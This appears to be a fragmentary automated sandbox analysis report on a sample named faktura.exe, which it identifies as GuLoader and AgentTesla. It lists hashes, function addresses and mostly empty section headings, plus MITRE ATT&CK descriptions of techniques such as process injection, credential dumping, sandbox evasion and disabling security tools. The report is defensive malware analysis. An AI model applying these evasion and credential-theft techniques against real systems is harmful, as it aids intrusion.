Opcode Fuzzy Hash: ef34f5bd64e9c65d91c7e69ffd18229c0ec8eb40ae121d20280197ba8d63dcdd
Instruction Fuzzy Hash: 65F06DB53012008FC358DA2CC5C4F19B3B2EB59351B658878E805CB666C734EC80D610

Uniqueness

Uniqueness Score: -1.00%

Function 00FA19C4, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a809a6efc3711035fc60249efdab8cec3f7cb0977637bbb26e79a6a09da3028
Instruction ID: 9b9a1b03434b91538bcec7efdddaac956f3da21471711a8ea16cbab9dc28bad8
Opcode Fuzzy Hash: 7a809a6efc3711035fc60249efdab8cec3f7cb0977637bbb26e79a6a09da3028
Instruction Fuzzy Hash: DEC04CB63026808FFB49DA19C491B0573A4AB44544B1804A4E403CB711D314E9108500

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2B62, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd91749df2412f964702dcd28fdcd38a131aa034e5a71c5e0d0edcc825f4dce
Instruction ID: 6eb199c6e652318b93580ffc8ba30bc05cde4d64e9b82cfd2b0de4c8f5e3ed5d
Opcode Fuzzy Hash: 9dd91749df2412f964702dcd28fdcd38a131aa034e5a71c5e0d0edcc825f4dce
Instruction Fuzzy Hash: 92B002757556408FDA55CE49D290F4173A4BB54B50B415494A415C7A11C664E900C914

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report faktura.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: GuLoader

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

SMTP Packets

Function 004015B8, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 477
COMMONCrypto

Function 0040EFC1, Relevance: 154.9, APIs: 81, Strings: 7, Instructions: 905
COMMON

Function 00411AAE, Relevance: 149.5, APIs: 80, Strings: 5, Instructions: 720
COMMON

Function 0040FEDD, Relevance: 138.9, APIs: 77, Strings: 2, Instructions: 639
COMMON

Function 00405950, Relevance: .1, Instructions: 121
COMMONCrypto

Function 00406351, Relevance: .0, Instructions: 40
COMMONCrypto

Function 0041098C, Relevance: 119.5, APIs: 65, Strings: 3, Instructions: 497
COMMON

Function 00411198, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 284
COMMON

Function 0041164C, Relevance: 40.8, APIs: 27, Instructions: 263
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre